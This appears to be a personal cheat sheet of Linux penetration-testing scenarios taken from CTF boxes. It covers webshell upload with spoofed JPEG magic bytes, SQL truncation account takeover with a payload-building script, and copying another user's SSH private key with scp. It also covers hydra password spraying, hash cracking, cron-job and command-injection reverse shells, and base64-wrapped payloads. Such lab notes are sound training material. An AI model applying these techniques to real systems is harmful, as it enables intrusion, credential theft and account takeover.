<html>

<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=Generator content="Microsoft Word 15 (filtered)">
<style>
<!--
 /* Font Definitions */
 @font-face
	{font-family:Wingdings;
	panose-1:5 0 0 0 0 0 0 0 0 0;}
@font-face
	{font-family:"Cambria Math";
	panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
	{font-family:Calibri;
	panose-1:2 15 5 2 2 2 4 3 2 4;}
 /* Style Definitions */
 p.MsoNormal, li.MsoNormal, div.MsoNormal
	{margin-top:0cm;
	margin-right:0cm;
	margin-bottom:8.0pt;
	margin-left:0cm;
	line-height:107%;
	font-size:11.0pt;
	font-family:"Calibri",sans-serif;}
p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph
	{margin-top:0cm;
	margin-right:0cm;
	margin-bottom:8.0pt;
	margin-left:36.0pt;
	line-height:107%;
	font-size:11.0pt;
	font-family:"Calibri",sans-serif;}
p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst
	{margin-top:0cm;
	margin-right:0cm;
	margin-bottom:0cm;
	margin-left:36.0pt;
	line-height:107%;
	font-size:11.0pt;
	font-family:"Calibri",sans-serif;}
p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle
	{margin-top:0cm;
	margin-right:0cm;
	margin-bottom:0cm;
	margin-left:36.0pt;
	line-height:107%;
	font-size:11.0pt;
	font-family:"Calibri",sans-serif;}
p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast
	{margin-top:0cm;
	margin-right:0cm;
	margin-bottom:8.0pt;
	margin-left:36.0pt;
	line-height:107%;
	font-size:11.0pt;
	font-family:"Calibri",sans-serif;}
.MsoPapDefault
	{margin-bottom:8.0pt;
	line-height:107%;}
@page WordSection1
	{size:595.3pt 841.9pt;
	margin:72.0pt 72.0pt 72.0pt 72.0pt;}
div.WordSection1
	{page:WordSection1;}
 /* List Definitions */
 ol
	{margin-bottom:0cm;}
ul
	{margin-bottom:0cm;}
-->
</style>

</head>

<body lang=EN-GB style='word-wrap:break-word'>

<div class=WordSection1>

<p class=MsoListParagraph><b><span style='font-size:24.0pt;line-height:107%'>Scenarios
– taken from CTF challenges</span></b></p>
	
==========================================================================================================================================================
	
<p><a href="winscen.html" style="display:block; background-color: blue; width:100px; padding: 20px; font-size: 30px; color:white; text-decoration:none;">
  Windows Priv Esc Scenarios
	</a></p>
	
===========================================================================================================================================================

<p class=MsoNormal><b><span style='font-size:22.0pt;line-height:107%'>&nbsp;</span></b></p>

<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%;
background:olive'>#### Deleted file by admin</span></b></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>.bash_history
reveals a command that references a file which has since been deleted (sudo -u sysadmin
/home/sysadmin/luvit privesc.lua)</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>sudo -l
reveals that sudo lets us run, as a more privileged user, software that executes Lua code (here luvit), so any Lua file we control runs with that user's rights</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>&nbsp;</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>echo
&quot;require('os');&quot; &gt; priv.lua</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>echo
&quot;os.execute('/bin/bash');&quot; &gt;&gt; priv.lua</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>then run priv.lua
with the sudo command recovered from .bash_history: os.execute spawns /bin/bash as the sudo target user</span></p>

<p class=MsoNormal><span style='font-size:18.0pt;line-height:107%'>&nbsp;</span></p>

<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%;
background:lime'>#### uploading tool to server</span></b></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>on the attacking
machine, place the tool in the web root and start Apache so the target can fetch it with wget or curl:</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>sudo mv
pspy64 /var/www/html</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>sudo service
apache2 start</span></p>

<p class=MsoNormal><span style='font-size:18.0pt;line-height:107%'>&nbsp;</span></p>

<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%;
color:white;background:purple'>#### backgrounding a shell</span></b></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>you can
start a command such as a reverse shell and append &amp; to run it in the background during an SSH
session, so the terminal is not blocked while it runs</span></p>

<p class=MsoNormal><span style='font-size:18.0pt;line-height:107%'>&nbsp;</span></p>

<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%;
color:white;background:navy'>#### Magic bytes</span></b></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>you attempt
to upload a file abc.php.jpg</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- it gets
flagged immediately: the upload handler checks the file content (the magic bytes), not only the extension</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>way around
it: </span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>get the
magic bytes from a real .jpg image (xxd image.jpg | head); a JPEG starts with FF D8 FF</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>write these to the
start of our upload, then append the PHP webshell after them (the echo on its own only produces a four-byte file)</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>echo
'FFD8FFDB' | xxd -r -p &gt; webshell.php.jpg</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>cat shell.php &gt;&gt; webshell.php.jpg</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>then upload.
PHP prints the leading bytes as output and still executes the &lt;?php block, but only if the server actually hands a .php.jpg file to PHP; this defeats a content check, not an extension whitelist</span></p>

<p class=MsoNormal><span style='font-size:18.0pt;line-height:107%'>&nbsp;</span></p>

<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%;
background:aqua'>### SQL Truncation</span></b></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- a website
states that a username or email cannot be longer than n characters (the limit is enforced in the form, and the backing column is VARCHAR(n))</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- from Burp,
send a username longer than what is permitted</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- so we
register with the admin's name followed by many spaces and a few extra characters, then URL encode the request</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- this works
because, per the MySQL documentation, a non-strict sql_mode silently truncates the value to the column length and PAD SPACE collations ignore trailing spaces in comparisons: the duplicate check sees a new, longer string, but the stored row compares equal to admin. It fails where STRICT_TRANS_TABLES is on (the 5.7+ default, which raises an error instead of truncating) or the collation is NO PAD (MySQL 8's default utf8mb4_0900_ai_ci)</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- so
register an account using admin@test.abc, then catch the request</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>- if the
admin's email is admin@abc.abc, add many spaces after it and then some extra characters; in the
form-encoded body the spaces appear as + (admin@abc.abc++++++++++++++test). Afterwards log in as admin@abc.abc with the password you set</span></p>
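<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>An added example (not from the original notes) that builds the padded registration value and URL-encodes it for a form body. The column width of 20 and the target value are assumptions; in practice the width is the limit the application states:</span></p>

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): craft a SQL truncation payload.
# WIDTH is the VARCHAR length inferred from the app's stated limit (assumed 20
# here); the target value and suffix are placeholders.

# pad_payload TARGET WIDTH SUFFIX -> TARGET, spaces up to WIDTH, then SUFFIX.
# The app's "already taken?" check sees a new, longer string; MySQL with a
# non-strict sql_mode stores only the first WIDTH characters, i.e. TARGET plus
# trailing spaces, which a PAD SPACE collation treats as equal to TARGET.
pad_payload() {
    target="$1"; width="$2"; suffix="$3"
    pad=$(( width - ${#target} ))
    if [ "$pad" -le 0 ]; then
        echo "error: target already fills the column, nothing to truncate" >&2
        return 1
    fi
    spaces=$(printf "%${pad}s" "")
    printf '%s%s%s\n' "$target" "$spaces" "$suffix"
}

# urlencode_form STRING -> application/x-www-form-urlencoded encoding:
# space becomes '+', unreserved characters pass through, everything else %XX.
# This is where the run of '+' in the captured Burp request comes from.
urlencode_form() {
    s="$1"; out=""; i=0
    while [ "$i" -lt "${#s}" ]; do
        c="${s:$i:1}"
        case "$c" in
            [A-Za-z0-9._~-]) out="$out$c" ;;
            ' ')             out="$out+" ;;
            *)               out="$out$(printf '%%%02X' "'$c")" ;;
        esac
        i=$((i + 1))
    done
    printf '%s\n' "$out"
}

# Constructed example: a 20-character email column, target admin@abc.abc
raw=$(pad_payload 'admin@abc.abc' 20 'test')
printf 'raw  : [%s]\nform : email=%s\n' "$raw" "$(urlencode_form "$raw")"
```

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%'>If the width is unknown, try increasing values: a payload shorter than the column is stored intact and simply creates a new, unrelated account.</span></p>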

<p class=MsoNormal><b><span style='font-size:22.0pt;line-height:107%'>&nbsp;</span></b></p>

<p class=MsoNormal><b><span style='font-size:26.0pt;line-height:107%;
color:white;background:teal'>#### Email changing to admin for priv</span></b></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%;color:black'>CTF
in which a standard user could change the admin's password by catching the password-change request in
Burp Suite and editing the email parameter from the user's email to the admin's (which is easy to find); the server trusted the submitted email rather than the session.</span></p>

<p class=MsoListParagraph style='text-indent:-18.0pt'><span style='font-size:
14.0pt;line-height:107%;color:black'>-<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span><span style='font-size:14.0pt;line-height:107%;color:black'>Then,
logged in as admin, view the source of the profile page: it reveals the image upload directory.</span></p>

<p class=MsoListParagraph style='text-indent:-18.0pt'><span style='font-size:
14.0pt;line-height:107%;color:black'>-<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span><span style='font-size:14.0pt;line-height:107%;color:black'>So
go back to the profile and upload a PHP reverse shell (there is no indicator of whether the upload
succeeded).</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%;color:black'>then,
in the browser, request the image upload directory followed by the reverse shell's file name</span></p>

<p class=MsoNormal><span style='font-size:14.0pt;line-height:107%;color:black'>(ensure
the listener is running first) – curl may be needed if the browser does not trigger it</span></p>

<p class=MsoListParagraphCxSpLast style='text-indent:-18.0pt'><span
style='font-size:14.0pt;line-height:107%;color:black'>-<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span><span style='font-size:14.0pt;line-height:107%;color:black'>Then, using
the sudo permission on /sbin/reboot, we reboot with that .sh file</span></p>
	
<h1><b><span style='background:yellow'>###### Source code</span></b></h1>

<p class=MsoNormal>even on directories you have already found, look at the source code, and run
curl on them all</p>

<p class=MsoNormal>&nbsp;</p>

<p class=MsoNormal>website: directory fuzzing gave only one link (the security-config
clue)</p>

<p class=MsoNormal>use curl -L to follow redirects, and look at the source</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:lime'>##### steghide extract issue</span></b></h1>

<p class=MsoNormal>I tried to extract using steghide extract -sf filename.jpg; it
would not work</p>

<p class=MsoNormal>however, when I wrote the output to another file, it worked:</p>

<p class=MsoNormal>steghide extract -sf filename.jpg -xf hash.txt</p>

<p class=MsoNormal>&nbsp;</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:silver'>##### Authorized keys</span></b></h1>

<p class=MsoNormal>if you come across an authorized_keys file belonging to userA, but an entry in it
ends with UserB's comment (the user@host field)</p>

<p class=MsoNormal>you can log in as userA using the private key of UserB: the trailing field is only a comment, but it tells you whose key the account trusts</p>

<p class=MsoNormal>we take the private key of userB, copy it to our attacking
machine, and use it to log in as userA (the copied key must be chmod 600 or ssh refuses it)</p>

<p class=MsoNormal>ssh userA@xx.xx.xx.xx -i .ssh/id_rsa_userB</p>

<p class=MsoNormal>copy to our system:</p>

<p class=MsoNormal>scp USERB@192.168.124.230:~/.ssh/id_rsa . </p>
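<p class=MsoNormal>An added example (not from the original notes) that lists whose key each authorized_keys line trusts and checks whether a given public key (the .pub beside a private key you found) matches an entry irrespective of its comment. The authorized_keys content and key blobs are constructed:</p>

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): read authorized_keys for the
# comment on each trusted key, and match a candidate public key by its blob.
# Key material below is fake; real blobs are long base64 strings.

# authorized_keys line format: [options] keytype base64blob [comment]
# ak_comments FILE -> "keytype comment" per key line; blanks and # lines skipped.
# Options without embedded spaces are handled; quoted options with spaces are not.
ak_comments() {
    awk '
        /^[[:space:]]*(#|$)/ { next }
        {
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^(ssh-(rsa|ed25519|dss)|ecdsa-sha2-nistp(256|384|521))$/) {
                    c = (i + 2 <= NF) ? $(i+2) : "(no comment)"
                    print $i, c
                    break
                }
            }
        }' "$1"
}

# ak_trusts_pub AUTHORIZED_KEYS PUBFILE -> 0 if the .pub key blob appears in the
# file. Only the blob is compared: the comment is free text and proves nothing.
ak_trusts_pub() {
    blob=$(awk '{print $2}' "$2")
    awk -v b="$blob" '
        { for (i = 1; i <= NF; i++) if ($i == b) { found = 1; exit } }
        END { exit found ? 0 : 1 }' "$1"
}

# Constructed data: userA's authorized_keys trusts a key whose comment names userB
demo=$(mktemp -d)
cat > "$demo/authorized_keys" <<'EOF'
# userA's authorized_keys on the target
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleBlobUserA0000000000000000000000 userA@target
no-pty,command="/bin/true" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExampleBlobUserB userB@workstation
EOF
printf 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExampleBlobUserB userB@workstation\n' > "$demo/id_rsa_userB.pub"

ak_comments "$demo/authorized_keys"
ak_trusts_pub "$demo/authorized_keys" "$demo/id_rsa_userB.pub" && echo "userB's key is trusted for this account"
```

<p class=MsoNormal>When only the private key is available, derive its public half with ssh-keygen -y -f id_rsa and feed that to the second function; note also that options such as command= on the matching line restrict what the resulting login can do.</p>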

<p class=MsoNormal>&nbsp;</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='color:white;background:maroon'>##### Enum’d everything, so cannot
find way in</span></b></h1>

<p class=MsoNormal>run the directory scan again with an extension set, i.e. -x .php</p>

<p class=MsoNormal>(or use dirsearch) with /web-content/big.txt and -e .php</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='color:white;background:navy'>##### Config file for lateral
movement</span></b></h1>

<p class=MsoNormal>when doing a box, if you have found a user but still need to do
lateral movement</p>

<p class=MsoNormal>go to /etc/phpmyadmin and look for the config file (on Debian-based
systems config-db.php holds the database username and password)</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:aqua'>##### DB/PHP passwords, user lists</span></b></h1>

<p class=MsoNormal>if you find DB passwords or PHP config passwords, create a user list
(from the directories under /home) and spray that single password against the list with hydra; people
reuse database passwords for their shell accounts</p>
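<p class=MsoNormal>An added example (not from the original notes) that builds the user list from a passwd file and a home directory listing and shows the hydra invocation for the single recovered password. The passwd content is constructed; the host and password are placeholders:</p>

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): build a spray list from passwd
# and /home, then spray one recovered password with hydra. Sample data is
# constructed; target and password are placeholders.

# login_users PASSWD_FILE -> accounts with uid >= 1000 (or root) and a real shell
login_users() {
    awk -F: '($3 >= 1000 || $3 == 0) && $7 !~ /(nologin|false)$/ { print $1 }' "$1"
}

# home_users HOMEDIR -> one name per subdirectory; catches accounts you could not
# read from passwd but whose home directory is listable
home_users() {
    for d in "$1"/*/; do
        [ -d "$d" ] && basename "$d"
    done
    return 0
}

# build_userlist PASSWD_FILE HOMEDIR -> merged, de-duplicated, no blank lines
build_userlist() {
    { login_users "$1"; home_users "$2"; } | sort -u | sed '/^$/d'
}

demo=$(mktemp -d)
cat > "$demo/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/zsh
svc_backup:x:1002:1002::/home/svc_backup:/usr/sbin/nologin
EOF
mkdir -p "$demo/home/alice" "$demo/home/bob" "$demo/home/charlie"

build_userlist "$demo/passwd" "$demo/home" > "$demo/users.txt"
cat "$demo/users.txt"
# Spray the one password over the list (-L login file, -p single password):
#   hydra -L users.txt -p 'RecoveredDbPass1' ssh://10.10.10.10
```

<p class=MsoNormal>Keep the list small and the password count at one: account lockout policies are far more likely to trigger when the same user is hit with many passwords than when one password is tried once per user.</p>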

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:red'>#### Upload perm to smb share / cron job in
management (box DAWN)</span></b></h1>

<p class=MsoNormal>you have management.log, which shows a cron job running, e.g.:</p>

<p class=MsoNormal>chmod 777 /home/dawn/ITDEPT/product-control </p>

<p class=MsoNormal>&nbsp;</p>

<p class=MsoNormal>you have upload access to the SMB share behind that directory</p>

<p class=MsoNormal>create an nc one-liner reverse shell, put it into a file named
product-control, upload it, start your listener and wait for the job to run it</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:fuchsia'>#### Unshadowed</span></b></h1>

<p class=MsoNormal>when we unshadow passwd and shadow (unshadow passwd shadow), the password
hashes are displayed next to their usernames; feed that output to john to crack them</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:teal'>##### Restricted shell</span></b></h1>

<p class=MsoNormal>type export (or env) in the shell to see the environment, in particular PATH and SHELL</p>

<p class=MsoNormal>is /bin writable?</p>

<p class=MsoNormal>ls -la /usr/bin (or /bin)</p>

<p class=MsoNormal>look for entries writable by all (a w in the last permission triple)</p>

<p class=MsoNormal>&nbsp;</p>

<p class=MsoNormal><b><span style='font-size:18.0pt;line-height:107%'>method 2:</span></b></p>

<p class=MsoNormal>ssh in using: -t &quot;bash --noprofile&quot;, so the profile that sets up the restricted shell is skipped</p>

<p class=MsoNormal>then you need to use absolute paths, as PATH is still limited: cat = /usr/bin/cat
&lt;file&gt;</p>

<p class=MsoNormal>&nbsp;</p>

<p class=MsoNormal><b><span style='font-size:18.0pt;line-height:107%'>method 3:</span></b></p>

<p class=MsoNormal>restore a normal PATH (works once you are in a shell that lets you set variables):</p>

<p class=MsoNormal>export
PATH=&quot;$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin&quot;</p>
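<p class=MsoNormal>An added example (not from the original notes) that turns the first two checks above into functions: which PATH entries the current user can write to, and which entries under a bin directory are world-writable. The directories it operates on are constructed so it can be run safely:</p>

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): the checks a restricted-shell
# escape starts with. The fake PATH and directories are constructed; point the
# functions at the real $PATH and /bin on a target.

# writable_path_dirs [PATH_STRING] -> PATH entries the current user may write to
# (a writable PATH directory lets you drop a binary that later runs as someone else)
writable_path_dirs() {
    p="${1:-$PATH}"
    old_ifs=$IFS; IFS=:; set -- $p; IFS=$old_ifs
    for d in "$@"; do
        [ -n "$d" ] && [ -d "$d" ] && [ -w "$d" ] && printf '%s\n' "$d"
    done
    return 0
}

# world_writable_in DIR -> direct children of DIR with the other-write bit set
# (the 'w' in the last triple you would spot in ls -la)
world_writable_in() {
    find "$1" -mindepth 1 -maxdepth 1 -perm -0002 2>/dev/null | sort
}

# Constructed layout: a read-only and a writable "bin" directory on a fake PATH
demo=$(mktemp -d)
mkdir -p "$demo/rbin" "$demo/wbin"
chmod 555 "$demo/rbin"
touch "$demo/wbin/update"
chmod 666 "$demo/wbin/update"      # anyone can overwrite this "binary"
fake_path="$demo/rbin:$demo/wbin:/nonexistent"

echo "writable PATH dirs:";    writable_path_dirs "$fake_path"
echo "world-writable in wbin:"; world_writable_in "$demo/wbin"
```

<p class=MsoNormal>Note that -w answers for the current user: run as root the read-only directory also reports writable, so check with the account you actually hold.</p>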

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='color:white;background:purple'>##### Making a file called
update in /tmp executable</span></b></h1>

<p class=MsoNormal>just echo a shell into it.</p>

<p class=MsoNormal>you may need to use the full path for nc (if used)</p>

<p class=MsoNormal>&nbsp;</p>

<p class=MsoNormal>this is what finally enabled me to run chmod: </p>

<p class=MsoNormal>export
PATH=&quot;$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin&quot;</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:olive'>#### Command injection using |</span> </b></h1>

<p class=MsoNormal>command injection found, but /etc/passwd could not be viewed</p>

<p class=MsoNormal>used Burp Suite to send the payloads</p>

<p class=MsoNormal>BUT reverse shells would not work, </p>

<p class=MsoNormal>command injection using | gives cleaner output: the original command's stdout is
piped into the injected command (which ignores it), so only the injected command's output comes back</p>

<p class=MsoNormal>enter the reverse shell exactly as found (no URL encoding or
anything) after the |</p>

<p class=MsoNormal>&nbsp;</p>

<p class=MsoNormal>- another thing: the website is on port 80, so make the reverse shell connect
back to port 80 on your machine; outbound traffic from the box may only be allowed on that port</p>
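<p class=MsoNormal>An added example (not from the original notes): a toy of the vulnerable pattern, user input spliced into a command line that a shell parses, showing why a | payload comes back cleaner than a ; payload, next to the fixed form that never reaches a shell. The "application" is a shell function standing in for the web handler, not any real site:</p>

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): separator behaviour in command
# injection. vuln_lookup stands in for a web handler that builds a command
# string from user input; safe_lookup is the fix.

# Vulnerable: the parameter is interpolated into a string that sh parses.
vuln_lookup() {
    sh -c "echo resolving host $1"
}

# Hardened: the value is passed as data and never parsed as shell syntax.
safe_lookup() {
    printf 'resolving host %s\n' "$1"
}

# With ';' the original command's output comes back mixed with ours.
# With '|' the original stdout is fed to the injected command's stdin, which
# id ignores, so only the injected command's output is returned.
semicolon_out=$(vuln_lookup '127.0.0.1; id')
pipe_out=$(vuln_lookup '127.0.0.1 | id')
safe_out=$(safe_lookup '127.0.0.1 | id')

printf '[;] %s\n\n[|] %s\n\n[hardened] %s\n' "$semicolon_out" "$pipe_out" "$safe_out"
```

<p class=MsoNormal>The same separator logic applies to a reverse shell payload: after | the original command's output is swallowed, which is why the connection arrives without the page's own output wrapped around it.</p>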

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:lime'>#### Rabbit hole!</span></b></h1>

<p class=MsoNormal>easyboxfun</p>

<p class=MsoNormal>kept concentrating on /gym instead of running a scan against the
main URL</p>

<p class=MsoNormal>&nbsp;</p>

<h1><b><span style='background:aqua'>##### Reverse shell escaping issues (wpwpn
box)</span></b></h1>

<p class=MsoNormal>we were trying to run a reverse shell using the command
pre&lt;system&gt; ' ' &lt;/pre&gt;; the Python reverse shell obviously contained </p>

<p class=MsoNormal>&quot;&quot; and '', so it doubled the number of '' in use;
putting \ before the '' enabled the reverse shell to connect</p>
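<p class=MsoNormal>An added example (not from the original notes) of two ways to get a quote-heavy payload through a single-quoted wrapper such as system('...'): escaping the inner quotes, or base64-encoding the whole payload so the wrapper only ever sees base64 characters. The payload string is a placeholder:</p>

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): quoting helpers for payloads that
# must sit inside a single-quoted wrapper. The payload is a placeholder.

# escape_for_php_single_quotes STRING -> STRING with every ' turned into \'
# so it can sit inside a PHP single-quoted literal; PHP unescapes \' back to '
# before system() ever sees the command.
escape_for_php_single_quotes() {
    printf '%s' "$1" | sed "s/'/\\\\'/g"
}

# b64_wrap COMMAND -> a one-liner containing only [A-Za-z0-9+/=] plus a few
# plain words; the target decodes and runs it, so no quoting context matters.
b64_wrap() {
    enc=$(printf '%s' "$1" | base64 | tr -d '\n')
    printf 'echo %s | base64 -d | sh\n' "$enc"
}

# b64_unwrap WRAPPED -> the original command, to confirm nothing was lost
b64_unwrap() {
    printf '%s' "$1" | sed 's/^echo //; s/ | base64 -d | sh$//' | base64 -d
}

payload="python3 -c 'import socket,os;print(\"hello\")'"
echo "escaped : $(escape_for_php_single_quotes "$payload")"
echo "wrapped : $(b64_wrap "$payload")"
```

<p class=MsoNormal>Prefer the base64 route when the injection point passes through several layers (URL decoding, PHP string parsing, then a shell): each layer would otherwise need its own escaping, and one wrong backslash breaks the connection silently.</p>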

</div>
	
 
</body>

</html>